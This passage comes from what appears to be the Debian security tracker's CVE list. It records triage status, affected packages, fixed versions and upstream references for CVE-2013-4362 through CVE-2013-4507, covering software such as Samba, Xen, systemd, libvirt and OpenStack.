	NOTE: http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_01.txt
	NOTE: http://redmine.lighttpd.net/issues/2525
CVE-2013-4507 (Cross-site scripting (XSS) vulnerability in CollectiveAccess Providenc ...)
	NOT-FOR-US: CollectiveAccess
CVE-2013-4506 RESERVED
CVE-2013-4505 (The is_this_legal function in mod_dontdothat for Apache Subversion 1.4 ...)
	- subversion 1.7.14-1 (bug #730541; unimportant)
	NOTE: Not built in the binary packages
CVE-2013-4504 (The Monster Menus module 7.x-1.x before 7.x-1.15 allows remote attacke ...)
	NOT-FOR-US: Drupal contrib module
CVE-2013-4503 (Cross-site scripting (XSS) vulnerability in the Feed Element Mapper mo ...)
	NOT-FOR-US: Drupal contrib module
CVE-2013-4502 (The FileField Sources module 6.x-1.x before 6.x-1.9 and 7.x-1.x before ...)
	NOT-FOR-US: Drupal contrib module
CVE-2013-4501 (The default views in the Quiz module 6.x-4.x before 6.x-4.5 for Drupal ...)
	NOT-FOR-US: Drupal contrib module
CVE-2013-4500 (The Quiz module 6.x-4.x before 6.x-4.5 for Drupal allows remote authen ...)
	NOT-FOR-US: Drupal contrib module
CVE-2013-4499 (Cross-site scripting (XSS) vulnerability in the Bean module 7.x-1.x be ...)
	NOT-FOR-US: Drupal contrib module
CVE-2013-4498 (The Spaces OG submodule in the Spaces module 6.x-3.x before 6.x-3.7 fo ...)
	NOT-FOR-US: Drupal contrib module
CVE-2013-4497 (The XenAPI backend in OpenStack Compute (Nova) Folsom, Grizzly, and Ha ...)
	- nova 2013.2-1
	[wheezy] - nova (OpenStack Essex is not affected)
	NOTE: https://bugs.launchpad.net/nova/+bug/1073306
	NOTE: https://github.com/openstack/nova/commit/ba0d007fb78bd1182c3c0b808dbd7ccc84640e80
	NOTE: https://bugs.launchpad.net/nova/+bug/1202266
	NOTE: https://github.com/openstack/nova/commit/5cced7a6dd32d231c606e25dbf762d199bf9cca7
CVE-2013-4496 (Samba 3.x before 3.6.23, 4.0.x before 4.0.16, and 4.1.x before 4.1.6 d ...)
	- samba 2:4.1.6+dfsg-1 (low)
	[wheezy] - samba 2:3.6.6-6+deb7u3
	[squeeze] - samba (Minor issue)
	- samba4
	[wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1
	NOTE: http://www.samba.org/samba/security/CVE-2013-4496
CVE-2013-4495 (The send_the_mail function in server/svr_mail.c in Terascale Open-Sour ...)
	{DSA-2796-1}
	- torque 2.4.16+dfsg-1.3 (bug #729333)
CVE-2013-4494 (Xen before 4.1.x, 4.2.x, and 4.3.x does not take the page_alloc_lock a ...)
	{DSA-3006-1}
	- xen 4.4.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
CVE-2013-4493 RESERVED
CVE-2013-4492 (Cross-site scripting (XSS) vulnerability in exceptions.rb in the i18n ...)
	{DSA-2830-1}
	- ruby-i18n 0.6.9-1
	- libi18n-ruby
	[squeeze] - libi18n-ruby (vulnerable code not present)
CVE-2013-4491 (Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view ...)
	{DSA-2888-1}
	- rails-4.0 4.0.2+dfsg-1 (bug #731290)
	- rails-3.2 3.2.16-3+0
	- ruby-actionpack-3.2 3.2.16-1 (bug #731288)
	- ruby-actionpack-2.3 (vulnerable code not present)
	- rails (Vulnerable code not present)
	NOTE: Starting with 2.3.14.1 rails is a transition package
CVE-2013-4490 (The SSH key upload feature (lib/gitlab_keys.rb) in gitlab-shell before ...)
	- gitlab (Fixed before initial release to Debian)
CVE-2013-4489 (The Grit gem for Ruby, as used in GitLab 5.2 before 5.4.1 and 6.x befo ...)
	- gitlab (Fixed before initial release to Debian)
CVE-2013-4488 (libgadu before 1.12.0 does not verify X.509 certificates from SSL serv ...)
	- libgadu (unimportant)
	NOTE: Intentional design decision
CVE-2013-4487 (Off-by-one error in the dane_raw_tlsa in the DANE library (libdane) in ...)
	- gnutls28 (libdane is not built; original patch for CVE-2013-4466 not applied)
	- gnutls26 (only 3.1.x and 3.2.x)
	NOTE: off-by-one issue in original fix for CVE-2013-4466
CVE-2013-4486 (Zanata 3.0.0 through 3.1.2 has RCE due to EL interpolation in logging ...)
	NOT-FOR-US: Zanata
CVE-2013-4485 (389 Directory Server 1.2.11.15 (aka Red Hat Directory Server before 8. ...)
	- 389-ds-base 1.3.2.9-1 (bug #730115)
CVE-2013-4484 (Varnish before 3.0.5 allows remote attackers to cause a denial of serv ...)
	{DSA-2814-1}
	- varnish 3.0.5-1 (medium; bug #728989)
	NOTE: https://www.varnish-cache.org/trac/ticket/1367
CVE-2013-4483 (The ipc_rcu_putref function in ipc/util.c in the Linux kernel before 3 ...)
	- linux 3.11.8-1 (low)
	[wheezy] - linux 3.2.57-1
	- linux-2.6 (low)
	[squeeze] - linux-2.6 (Minor issue, too intrusive to backport)
	NOTE: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6062a8
CVE-2013-4482 (Untrusted search path vulnerability in python-paste-script (aka paster ...)
	NOT-FOR-US: LuCi
CVE-2013-4481 (Race condition in Luci 0.26.0 creates /var/lib/luci/etc/luci.ini with ...)
	NOT-FOR-US: LuCi
CVE-2013-4480 (Red Hat Satellite 5.6 and earlier does not disable the web interface t ...)
	NOT-FOR-US: Red Hat Satellite
CVE-2013-4479 (lib/sup/message_chunks.rb in Sup before 0.13.2.1 and 0.14.x before 0.1 ...)
	{DSA-2805-1}
	- sup-mail 0.12.1+git20120407.aaa852f-1+deb7u1 (bug #728232)
	NOTE: https://github.com/sup-heliotrope/sup/commit/ca0302e0c716682d2de22e9136400c704cc93e42
CVE-2013-4478 (Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers ...)
	{DSA-2805-1}
	- sup-mail 0.12.1+git20120407.aaa852f-1+deb7u1 (bug #728232)
	NOTE: http://rubyforge.org/pipermail/sup-talk/2013-October/004996.html
	NOTE: https://github.com/sup-heliotrope/sup/commit/8b46cdbfc14e07ca07d403aa28b0e7bc1c544785
CVE-2013-4477 (The LDAP backend in OpenStack Identity (Keystone) Grizzly and Havana, ...)
	- keystone 2013.2-2 (bug #728233)
	[wheezy] - keystone (Vulnerable code not present)
	NOTE: https://bugs.launchpad.net/keystone/+bug/1242855
CVE-2013-4476 (Samba 4.0.x before 4.0.11 and 4.1.x before 4.1.1, when LDAP or HTTP is ...)
	- samba 2:4.0.11+dfsg-1 (low)
	[wheezy] - samba (Doesn't provide AD functionality)
	[squeeze] - samba (Doesn't provide AD functionality)
	- samba4 (low)
	[wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1
CVE-2013-4475 (Samba 3.2.x through 3.6.x before 3.6.20, 4.0.x before 4.0.11, and 4.1. ...)
	{DSA-2812-1}
	- samba 2:4.0.11+dfsg-1 (low)
	- samba4 (low)
	[wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1
CVE-2013-4474 (Format string vulnerability in the extractPages function in utils/pdfs ...)
	{DLA-1074-1}
	- poppler 0.18.4-9 (low; bug #729064)
	[squeeze] - poppler (pdfseparate not yet present)
CVE-2013-4473 (Stack-based buffer overflow in the extractPages function in utils/pdfs ...)
	{DLA-1074-1}
	- poppler 0.18.4-9 (low; bug #729064)
	[squeeze] - poppler (pdfseparate not yet present)
CVE-2013-4472 (The openTempFile function in goo/gfile.cc in Xpdf and Poppler 0.24.3 a ...)
	- poppler (unimportant)
	- xpdf (unimportant)
	NOTE: specific to non-*NIX systems
CVE-2013-4471 (The Identity v3 API in OpenStack Dashboard (Horizon) before 2013.2 doe ...)
	- horizon 2013.2-1
	[wheezy] - horizon (v3 API introduced in Grizzly)
	NOTE: https://bugs.launchpad.net/horizon/+bug/1237989
CVE-2013-4470 (The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is ...)
	{DLA-0015-1}
	- linux 3.11.7-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48squeeze8
	[wheezy] - linux 3.2.53-1
CVE-2013-4469 (OpenStack Compute (Nova) Folsom, Grizzly, and Havana, when use_cow_ima ...)
	- nova 2013.2-3 (low; bug #728605)
	[wheezy] - nova (Minor issue)
	NOTE: CVE for incomplete fix of CVE-2013-2096
CVE-2013-4468 (VICIDIAL dialer (aka Asterisk GUI client) 2.8-403a, 2.7, 2.7RC1, and e ...)
	NOT-FOR-US: VICIDIAL
CVE-2013-4467 (Multiple SQL injection vulnerabilities in the agent interface (agc/) i ...)
	NOT-FOR-US: VICIDIAL
CVE-2013-4466 (Buffer overflow in the dane_query_tlsa function in the DANE library (l ...)
	- gnutls26 (only 3.1.x and 3.2.x)
	- gnutls28 (libdane is not built)
	NOTE: http://www.gnutls.org/security.html#GNUTLS-SA-2013-3
	NOTE: Upstream commit for 3.2.x: https://gitlab.com/gnutls/gnutls/commit/ed51e5e53cfbab3103d6b7b85b7ba4515e4f30c3
CVE-2013-4465 (Unrestricted file upload vulnerability in the avatar upload functional ...)
	NOT-FOR-US: Simple Machines Forum
CVE-2013-4464 RESERVED
CVE-2013-4463 (OpenStack Compute (Nova) Folsom, Grizzly, and Havana does not properly ...)
	- nova 2013.2-3 (low; bug #728605)
	[wheezy] - nova (Minor issue)
CVE-2013-4462 (WordPress Portable phpMyAdmin Plugin has an authentication bypass vuln ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-4461 (SQL injection vulnerability in the web interface for cumin in Red Hat ...)
	NOT-FOR-US: Cumin
CVE-2013-4460 (Cross-site scripting (XSS) vulnerability in account_sponsor_page.php i ...)
	{DSA-3120-1}
	- mantis (low; bug #727180)
	[squeeze] - mantis (Unsupported in squeeze-lts)
	NOTE: http://www.mantisbt.org/bugs/view.php?id=16513
CVE-2013-4459 (LightDM 1.7.5 through 1.8.3 and 1.9.x before 1.9.2 does not apply the ...)
	- lightdm (Only in combination with guest profile, apparmor and 1.8.x branch)
CVE-2013-4458 (Stack-based buffer overflow in the getaddrinfo function in sysdeps/pos ...)
	{DLA-165-1}
	- eglibc
	- glibc 2.18-1 (low; bug #727181)
	[wheezy] - eglibc 2.13-38+deb7u1
	NOTE: https://sourceware.org/ml/libc-alpha/2013-10/msg00733.html
	NOTE: https://sourceware.org/bugzilla/show_bug.cgi?id=16072
CVE-2013-4457 (The Cocaine gem 0.4.0 through 0.5.2 for Ruby allows context-dependent ...)
	NOT-FOR-US: Cocaine rubygem
CVE-2013-4456 RESERVED
CVE-2013-4455 (Katello Installer before 0.0.18 uses world-readable permissions for /e ...)
	NOT-FOR-US: Katello
CVE-2013-4454 (WordPress Portable phpMyAdmin Plugin 1.4.1 has Multiple Security Bypas ...)
	NOT-FOR-US: WordPress plugin
CVE-2013-4453 (Cross-site scripting (XSS) vulnerability in templates/login.php in LDA ...)
	- ldap-account-manager 4.4-1 (medium; bug #726976)
	[wheezy] - ldap-account-manager (Minor issue)
	[squeeze] - ldap-account-manager (Minor issue)
CVE-2013-4452 (Red Hat JBoss Operations Network 3.1.2 uses world-readable permissions ...)
	NOT-FOR-US: JBoss Operation Network
CVE-2013-4451 (gitolite commit fa06a34 through 3.5.3 might allow attackers to have un ...)
	- gitolite (vulnerable code introduced for v3.5.3)
	- gitolite3 (vulnerable code introduced for v3.5.3)
CVE-2013-4450 (The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8. ...)
	- nodejs 0.10.21~dfsg1-1 (medium)
	NOTE: https://github.com/joyent/node/commit/085dd30e93da67362f044ad1b3b6b2d997064692
	NOTE: http://blog.nodejs.org/2013/10/18/node-v0-10-21-stable/
CVE-2013-4449 (The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier does not prope ...)
	{DSA-3209-1 DLA-203-1}
	- openldap 2.4.39-1.1 (low; bug #729367)
	[wheezy] - openldap (Minor issue)
	[squeeze] - openldap (Minor issue)
	NOTE: http://www.openldap.org/its/index.cgi/Incoming?id=7723
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1019490
CVE-2013-4448 REJECTED
CVE-2013-4447 (Cross-site scripting (XSS) vulnerability in the API in the Simplenews ...)
	NOT-FOR-US: Simplenews Drupal contributed module
CVE-2013-4446 (The _json_decode function in plugins/context_reaction_block.inc in the ...)
	NOT-FOR-US: Context Drupal contributed module
CVE-2013-4445 (The json rendering functionality in the Context module 6.x-2.x before ...)
	NOT-FOR-US: Context Drupal contributed module
CVE-2013-4444 (Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0 ...)
	- tomcat7 7.0.40-1
	[wheezy] - tomcat7 7.0.28-4+deb7u3
	NOTE: https://svn.apache.org/viewvc?view=revision&revision=1470435
CVE-2013-4443 REJECTED
CVE-2013-4442 (Password Generator (aka Pwgen) before 2.07 uses weak pseudo generated ...)
	- pwgen 2.07-1 (unimportant; bug #767008)
	NOTE: /dev/random is universally available, if an attacker can create an environment
	NOTE: where it's not available that opens a far bigger can of worms
CVE-2013-4441 (The Phonemes mode in Pwgen 2.06 generates predictable passwords, which ...)
	- pwgen (unimportant; bug #726578)
	NOTE: pwgen is documented to generate memorable passwords, so this is by design
CVE-2013-4440 (Password Generator (aka Pwgen) before 2.07 generates weak non-tty pass ...)
	- pwgen 2.07-1 (unimportant; bug #725507)
	NOTE: Documented shortcoming
CVE-2013-4439 (Salt (aka SaltStack) before 0.15.0 through 0.17.0 allows remote authen ...)
	- salt 0.17.1+dfsg-1 (bug #726480)
CVE-2013-4438 (Salt (aka SaltStack) before 0.17.1 allows remote attackers to execute ...)
	- salt 0.17.1+dfsg-1 (bug #726480)
CVE-2013-4437 (Unspecified vulnerability in salt-ssh in Salt (aka SaltStack) 0.17.0 h ...)
	- salt 0.17.1+dfsg-1 (bug #726480)
CVE-2013-4436 (The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 ...)
	- salt 0.17.1+dfsg-1 (bug #726480)
CVE-2013-4435 (Salt (aka SaltStack) 0.15.0 through 0.17.0 allows remote authenticated ...)
	- salt 0.17.1+dfsg-1 (bug #726480)
CVE-2013-4434 (Dropbear SSH Server before 2013.59 generates error messages for a fail ...)
	- dropbear 2012.55-1.4 (low; bug #726118)
	[squeeze] - dropbear (Minor issue)
	[wheezy] - dropbear (Minor issue)
CVE-2013-4433 (Cross-site scripting (XSS) vulnerability in XHProf before 0.9.4 allows ...)
	- xhprof 0.9.4-1 (bug #726284)
CVE-2013-4432 (Mahara before 1.5.13, 1.6.x before 1.6.8, and 1.7.x before 1.7.4 does ...)
	- mahara (low; bug #727539)
	[squeeze] - mahara (Minor issue)
	NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.7_STABLE/revision/5831
	NOTE: https://gitorious.org/mahara/mahara/commit/0b4952e063f50c001e4c2dfc5749f55258bff952
CVE-2013-4431 (Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 does ...)
	- mahara (low; bug #727552)
	[squeeze] - mahara (Minor issue)
	NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.7_STABLE/revision/5832
	NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.5_STABLE/revision/5542
	NOTE: https://bugs.launchpad.net/mahara/+bug/1233500
CVE-2013-4430 (Cross-site scripting (XSS) vulnerability in Mahara before 1.5.12, 1.6. ...)
	- mahara (unimportant; bug #727548)
	NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.7_STABLE/revision/5830
	NOTE: https://bugs.launchpad.net/mahara/+bug/1175446
	NOTE: Only exploitable during installation
CVE-2013-4429 (Mahara before 1.5.12, 1.6.x before 1.6.7, and 1.7.x before 1.7.3 does ...)
	- mahara (low; bug #727545)
	NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.7_STABLE/revision/5833
	NOTE: https://bazaar.launchpad.net/~mahara-release/mahara/1.5_STABLE/revision/5543
	NOTE: https://bugs.launchpad.net/mahara/+bug/1211758
	[squeeze] - mahara (Minor issue)
CVE-2013-4428 (OpenStack Image Registry and Delivery Service (Glance) Folsom, Grizzly ...)
	- glance 2013.2-1 (bug #726478)
	[wheezy] - glance (does not have the download_image)
CVE-2013-4427 (pyxtrlock before 0.2 does not properly check the return values of the ...)
	NOT-FOR-US: pyxtrlock
CVE-2013-4426 (pyxtrlock before 0.1 uses an incorrect variable name, which allows phy ...)
	NOT-FOR-US: pyxtrlock
CVE-2013-4425 (The DICOM listener in OsiriX before 5.8 and before 2.5-MD, when starti ...)
	NOT-FOR-US: Osirix
CVE-2013-4424 (Multiple cross-site scripting (XSS) vulnerabilities in the GateIn Port ...)
	NOT-FOR-US: GateIn
CVE-2013-4423 (CloudForms stores user passwords in recoverable format ...)
	NOT-FOR-US: Red Hat CloudForms
CVE-2013-4422 (SQL injection vulnerability in Quassel IRC before 0.9.1, when Qt 4.8.5 ...)
	- quassel 0.9.1-1
	[wheezy] - quassel (Issue only relevant if the Qt 4.8.5 fix would be backported)
	[squeeze] - quassel (qt4-x11 is too old)
	NOTE: Issue when used with Qt >= 4.8.5 and PostgreSQL >= 8.2
	NOTE: http://quassel-irc.org/node/120
	NOTE: http://bugs.quassel-irc.org/issues/1244
	NOTE: https://github.com/quassel/quassel/commit/aa1008be162cb27da938cce93ba533f54d228869
	NOTE: Caused by a change in Qt's postgres driver:
	NOTE: https://bugreports.qt-project.org/browse/QTBUG-30076
	NOTE: https://qt.gitorious.org/qt/qtbase/commit/e3c5351d06ce8a12f035cd0627356bc64d8c334a
CVE-2013-4421 (The buf_decompress function in packet.c in Dropbear SSH Server before ...)
	- dropbear 2012.55-1.4 (low; bug #726019)
	[squeeze] - dropbear (Minor issue)
	[wheezy] - dropbear (Minor issue)
	NOTE: https://hg.ucc.asn.au/dropbear/rev/0bf76f54de6f
CVE-2013-4420 (Multiple directory traversal vulnerabilities in the (1) tar_extract_gl ...)
	{DSA-2863-1}
	- libtar 1.2.20-2 (bug #731860)
CVE-2013-4419 (The guestfish command in libguestfs 1.20.12, 1.22.7, and earlier, when ...)
	- libguestfs 1:1.22.7-1
	[wheezy] - libguestfs 1:1.18.1-1+deb7u3
CVE-2013-4418 REJECTED
CVE-2013-4417 REJECTED
CVE-2013-4416 (The Ocaml xenstored implementation (oxenstored) in Xen 4.1.x, 4.2.x, a ...)
	- xen (ocaml version of the xenstore daemon not used in Debian)
CVE-2013-4415 (Multiple cross-site scripting (XSS) vulnerabilities in Spacewalk and R ...)
	NOT-FOR-US: Red Hat Satellite
CVE-2013-4414 (Cross-site scripting (XSS) vulnerability in the web interface for cumi ...)
	NOT-FOR-US: Cumin
CVE-2013-4413 (Directory traversal vulnerability in controller/concerns/render_redire ...)
	NOT-FOR-US: Wicked Ruby Gem
CVE-2013-4412 (slim has NULL pointer dereference when using crypt() method from glibc ...)
	- slim 1.3.6-0.1 (bug #725902)
	[wheezy] - slim (Only exploitable with eglibc 2.17 and later)
	[squeeze] - slim (Only exploitable with eglibc 2.17 and later)
	NOTE: Upstream fix: http://git.berlios.de/cgi-bin/cgit.cgi/slim/commit/?id=fbdfae3b406b1bb6f4e5e440e79b9b8bb8f071f
CVE-2013-4411 (Review Board: URL processing gives unauthorized users access to review ...)
	- reviewboard (bug #653113)
CVE-2013-4410 (ReviewBoard: has an access-control problem in REST API ...)
	- reviewboard (bug #653113)
CVE-2013-4409 (An eval() vulnerability exists in Python Software Foundation Djblets 0 ...)
	- djblets (low; bug #726039)
	- python-django-djblets (low)
	[squeeze] - python-django-djblets (Minor issue)
	NOTE: Fix: https://github.com/djblets/djblets/commit/36cd15763742652ca990f913b44e91c69c707269
CVE-2013-4408 (Heap-based buffer overflow in the dcerpc_read_ncacn_packet_done functi ...)
	{DSA-2812-1}
	- samba 2:4.0.13+dfsg-1
	- samba4
	[wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1
CVE-2013-4407 (HTTP::Body::Multipart in the HTTP-Body 1.08, 1.17, and earlier module ...)
	{DSA-2801-1}
	- libhttp-body-perl 1.17-2 (bug #721634)
	[squeeze] - libhttp-body-perl (Vulnerable code introduced in 1.08)
CVE-2013-4406 (The Quick Tabs module 6.x-2.x before 6.x-2.2, 6.x-3.x before 6.x-3.2, ...)
	NOT-FOR-US: Quick Tabs Drupal contributed module
CVE-2013-4405 (Multiple cross-site request forgery (CSRF) vulnerabilities in the web ...)
	NOT-FOR-US: Cumin
CVE-2013-4404 (cumin in Red Hat Enterprise MRG Grid 2.4 does not properly enforce use ...)
	NOT-FOR-US: Cumin
CVE-2013-4403 REJECTED
CVE-2013-4402 (The compressed packet parser in GnuPG 1.4.x before 1.4.15 and 2.0.x be ...)
	{DSA-2774-1 DSA-2773-1}
	- gnupg2 2.0.22-1 (bug #725433)
	- gnupg 1.4.15-1 (bug #725439)
CVE-2013-4401 (The virConnectDomainXMLToNative API function in libvirt 1.1.0 through ...)
	- libvirt 1.1.4-1 (bug #727101)
	[squeeze] - libvirt (Introduced in 1.1.0, REMOTE_PROC_CONNECT_DOMAIN_XML_TO|FROM_NATIVE not yet present)
	[wheezy] - libvirt (Introduced in 1.1.0, REMOTE_PROC_CONNECT_DOMAIN_XML_TO|FROM_NATIVE not yet present)
	NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=57687fd6bf7f6e1b3662c52f3f26c06ab19dc96c
CVE-2013-4400 (virt-login-shell in libvirt 1.1.2 through 1.1.3 allows local users to ...)
	- libvirt 1.1.4-1 (bug #727101)
	[squeeze] - libvirt (Introduced in 1.1.2, virt-login-shell not yet present)
	[wheezy] - libvirt (Introduced in 1.1.2, virt-login-shell not yet present)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1015228#c3
CVE-2013-4399 (The remoteClientFreeFunc function in daemon/remote.c in libvirt before ...)
	- libvirt 1.1.4-1
	[wheezy] - libvirt (Introduced in 1.1.0)
	[squeeze] - libvirt (Introduced in 1.1.0)
CVE-2013-4398 REJECTED
CVE-2013-4397 (Multiple integer overflows in the th_read function in lib/block.c in l ...)
	{DSA-2817-1}
	- libtar 1.2.20-1 (bug #725938)
CVE-2013-4396 (Use-after-free vulnerability in the doImageText function in dix/dixfon ...)
	{DSA-2784-1}
	- xorg-server 2:1.14.3-4
CVE-2013-4395 (Simple Machines Forum (SMF) through 2.0.5 has XSS ...)
	NOT-FOR-US: Simple Machines Forum
CVE-2013-4394 (The SetX11Keyboard function in systemd, when PolicyKit Local Authority ...)
	{DSA-2777-1}
	- systemd 204-5 (bug #725357)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=862324
	NOTE: http://cgit.freedesktop.org/systemd/systemd/commit/?id=0b507b17a760b21e33fc52ff377db6aa5086c680
CVE-2013-4393 (journald in systemd, when the origin of native messages is set to file ...)
	- systemd 204-5 (bug #725357)
	[wheezy] - systemd (Vulnerable code not present)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=859104
	NOTE: http://cgit.freedesktop.org/systemd/systemd/commit/?id=1dfa7e79a60de680086b1d93fcc3629b463f58bd
CVE-2013-4392 (systemd, when updating file permissions, allows local users to change ...)
	- systemd (unimportant; bug #725357)
	[wheezy] - systemd (/etc/tmpfiles.d not supported in Wheezy)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=859060
	NOTE: only relevant to systems running systemd along with selinux
CVE-2013-4391 (Integer overflow in the valid_user_field function in journal/journald- ...)
	{DSA-2777-1}
	- systemd 204-5 (bug #725357)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=859051
	NOTE: http://cgit.freedesktop.org/systemd/systemd/commit/?id=505b6a61c22d5565e9308045c7b9bf79f7d0517e
CVE-2013-4390 (Open redirect vulnerability in the AbstractAuthenticationFormServlet i ...)
	NOT-FOR-US: Apache Sling
CVE-2013-4389 (Multiple format string vulnerabilities in log_subscriber.rb files in t ...)
	{DSA-2888-1 DSA-2887-1}
	- rails-4.0 (Only affects 3.x)
	- ruby-actionmailer-3.2 3.2.16-1 (bug #726576)
	- ruby-actionmailer-2.3 (Only affects 3.x)
	- rails (Only affects 3.x)
	NOTE: Starting with 2.3.14.1 rails is a transition package
CVE-2013-4388 (Buffer overflow in the mp4a packetizer (modules/packetizer/mpeg4audio. ...)
	{DSA-2973-1}
	- vlc 2.1.0-1 (bug #726528)
	[squeeze] - vlc (Unsupported in squeeze-lts)
	NOTE: http://git.videolan.org/?p=vlc.git;a=commitdiff;h=9794ec1cd268c04c8bca13a5fae15df6594dff3e
CVE-2013-4387 (net/ipv6/ip6_output.c in the Linux kernel through 3.11.4 does not prop ...)
	{DLA-0015-1}
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-48squeeze8
	- linux 3.11.5-1
	[wheezy] - linux 3.2.53-1
CVE-2013-4386 (Multiple SQL injection vulnerabilities in app/models/concerns/host_com ...)
	- foreman (bug #663101)
CVE-2013-4385 (Buffer overflow in the "read-string!" procedure in the "extras" unit i ...)
	- chicken 4.8.0.5-1 (bug #724740; low)
	[wheezy] - chicken (Minor issue)
	[squeeze] - chicken (Minor issue)
	NOTE: http://code.call-cc.org/cgi-bin/gitweb.cgi?p=chicken-core.git;a=commit;h=cd1b9775005ebe220ba11265dbf5396142e65f26
CVE-2013-4384 (Cross-site scripting (XSS) vulnerability in Google Site Search module ...)
	NOT-FOR-US: Drupal module
CVE-2013-4383 (Cross-site scripting (XSS) vulnerability in the jQuery Countdown modul ...)
	NOT-FOR-US: Drupal module
CVE-2013-4382 REJECTED
CVE-2013-4381 REJECTED
CVE-2013-4380 (Cross-site scripting (XSS) vulnerability in the MediaFront module 6.x- ...)
	NOT-FOR-US: Drupal module
CVE-2013-4379 (The Make Meeting Scheduler module 6.x-1.x before 6.x-1.3 for Drupal al ...)
	NOT-FOR-US: Drupal module
CVE-2013-4378 (Cross-site scripting (XSS) vulnerability in HtmlSessionInformationsRep ...)
	NOT-FOR-US: Javamelody
CVE-2013-4377 (Use-after-free vulnerability in the virtio-pci implementation in Qemu ...)
	- qemu 1.7.0+dfsg-4
	[wheezy] - qemu (Introduced in 1.4)
	[squeeze] - qemu (Introduced in 1.4)
	- qemu-kvm (Introduced in 1.4)
	NOTE: patches: http://thread.gmane.org/gmane.comp.emulators.qemu/234440
CVE-2013-4376 (The setgid wrapper libx2go-server-db-sqlite3-wrapper.c in X2Go Server ...)
	- x2goserver (Fixed with first upload to Debian)
	NOTE: Fixed by: https://code.x2go.org/gitweb?p=x2goserver.git;a=commitdiff;h=42264c88d7885474ebe3763b2991681ddfcfa69a
CVE-2013-4375 (The qdisk PV disk backend in qemu-xen in Xen 4.2.x and 4.3.x before 4. ...)
	- xen 4.2
	[squeeze] - xen (Only affects 4.2 and later)
	[wheezy] - xen (Only affects 4.2 and later)
	- qemu 1.7.0+dfsg-1
	[jessie] - qemu (Xen in Wheezy uses its internal copy of qemu)
	[wheezy] - qemu (Xen in Wheezy uses its internal copy of qemu)
	[squeeze] - qemu (vulnerable from version 1.1 onwards)
	- qemu-kvm (This only affects Qemu in combination with Xen)
	- xen-qemu-dm-4.0 (Affected code not yet present)
	NOTE: This is only exploitable in combination with Xen.
	NOTE: Xen in Squeeze uses a separate source package: xen-qemu-dm-4.0
	NOTE: Xen in Wheezy includes qemu
	NOTE: Xen after Wheezy uses qemu-system-x86 from qemu, marking 4.2 as pseudo fixed
CVE-2013-4374 (An insecurity temporary file vulnerability exists in RHQ Mongo DB Drif ...)
	NOT-FOR-US: RHQ MongoDB Drift Server
CVE-2013-4373 (The storeFiles method in JPADriftServerBean in Red Hat JBoss Operation ...)
	NOT-FOR-US: Red Hat JBoss Operations Network
CVE-2013-4372 (Multiple cross-site scripting (XSS) vulnerabilities in Fuse Management ...)
	NOT-FOR-US: JBoss Fuse
CVE-2013-4371 (Use-after-free vulnerability in the libxl_list_cpupool function in the ...)
	- xen 4.4.0-1
	[wheezy] - xen (Vulnerable code only present from 4.2 onwards)
	[squeeze] - xen (Vulnerable code only present from 4.2 onwards)
CVE-2013-4370 (The ocaml binding for the xc_vcpu_getaffinity function in Xen 4.2.x an ...)
	- xen 4.4.0-1
	[wheezy] - xen (Vulnerable code only present from 4.2 onwards)
	[squeeze] - xen (Vulnerable code only present from 4.2 onwards)
CVE-2013-4369 (The xlu_vif_parse_rate function in the libxlu library in Xen 4.2.x and ...)
	- xen 4.4.0-1
	[wheezy] - xen (Vulnerable code only present from 4.2 onwards)
	[squeeze] - xen (Vulnerable code only present from 4.2 onwards)
CVE-2013-4368 (The outs instruction emulation in Xen 3.1.x, 4.2.x, 4.3.x, and earlier ...)
	{DSA-3006-1}
	- xen 4.4.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
CVE-2013-4367 (ovirt-engine 3.2 running on Linux kernel 3.1 and newer creates certain ...)
	NOT-FOR-US: ovirt
CVE-2013-4366 (http/impl/client/HttpClientBuilder.java in Apache HttpClient 4.3.x bef ...)
	- httpcomponents-client 4.3.2-1
	[wheezy] - httpcomponents-client (vulnerable code not present)
	NOTE: http://svn.apache.org/r1528614
CVE-2013-4365 (Heap-based buffer overflow in the fcgid_header_bucket_read function in ...)
	{DSA-2778-1}
	- libapache2-mod-fcgid 1:2.3.9-1 (bug #725942)
CVE-2013-4364 ((1) oo-analytics-export and (2) oo-analytics-import in the openshift-o ...)
	NOT-FOR-US: OpenShift
CVE-2013-4363 (Algorithmic complexity vulnerability in Gem::Version::ANCHORED_VERSION ...)
	- rubygems 3.2.0~rc.1-1 (unimportant; bug #722361)
	- libgems-ruby (unimportant; bug #722361)
	NOTE: Non-issue, you trust the site providing the gem with installing arbitrary code, allowing
	NOTE: it a potential elevated CPU consumption doesn't add any extra harm
	NOTE: CVE for incomplete fix for CVE-2013-4287
CVE-2013-4362 (WEB-DAV Linux File System (davfs2) 1.4.6 and 1.4.7 allow local users t ...)
	{DSA-2765-1}
	- davfs2 1.4.7-3 (bug #723034)
	NOTE: http://savannah.nongnu.org/bugs/?40034
